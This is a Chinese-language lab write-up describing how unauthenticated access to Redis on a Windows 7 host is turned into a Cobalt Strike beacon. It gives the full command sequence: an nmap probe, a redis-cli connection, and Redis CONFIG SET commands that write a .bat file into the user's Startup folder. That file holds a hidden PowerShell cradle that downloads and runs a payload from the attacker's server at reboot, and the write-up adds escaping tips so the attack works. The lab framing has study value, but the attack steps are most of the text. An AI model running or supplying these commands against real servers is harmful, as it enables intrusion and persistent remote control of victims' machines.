记一次实验：redis未授权到cs上线（windows）

简介

cs服务器：192.168.43.113（kali）
cs客户端兼攻击机：192.168.43.101（win10）
靶机：192.168.43.42（win7）

前期准备

kali搭建cs服务器

sudo ./teamserver 192.168.43.113 yuchi123

win10启动cs客户端

探测靶机开放端口

nmap.exe 192.168.43.42 -p 6379

攻击步骤

nmap探测是否存在redis未授权

nmap探测到redis的信息，说明存在redis未授权漏洞

我们这边探测到目标主机为windos，所以可以利用写入启动项的方法进行cs上线
若目标主机是linux的话，网上有很多教程方法，我这里就不介绍了

连接靶机redis

redis-cli -h 192.168.43.42

成功连接，可查看到信息

cs上线

利用redis写入启动项，目标主机重启之后即可上线

cs开启监听

创建监听端口


选择我们刚刚创建的监听


监听开启成功

redis写入powershell

192.168.43.42:6379> config set dir "C:/Users/yuchi/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
#这里正常的user应该是Administrator，而我这边是yuchi，是因为靶机用户名是yuchi，所以需要修改，不然没有路径（这就是修改用户名的重要性）
192.168.43.42:6379> CONFIG SET dbfilename 1.bat
192.168.43.42:6379> set x "\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.43.113:80/a'))\"\r\n\r\n"
#这里需要注意一下，由于dbfile本身是有内容的，因此命令要正常运行必须先换行，经过测试需要两个换行符rn才能正常运行，还有一个是由于本身执行命令中也有双引号，因此需要加入转义，所以在前后加了\r\n\r\n，以及在里面的双引号前面加\进行转义
192.168.43.42:6379> save

我们看一下写进去之后的样子，在相关路径下出现了1.bat的文件，文件内容就是我们写进去的shell

靶机重启，cs上线

我们手动将靶机重启，重启之后，cs客户端就会上线靶机了

我们修改下心跳时间，这样有利于我们执行命令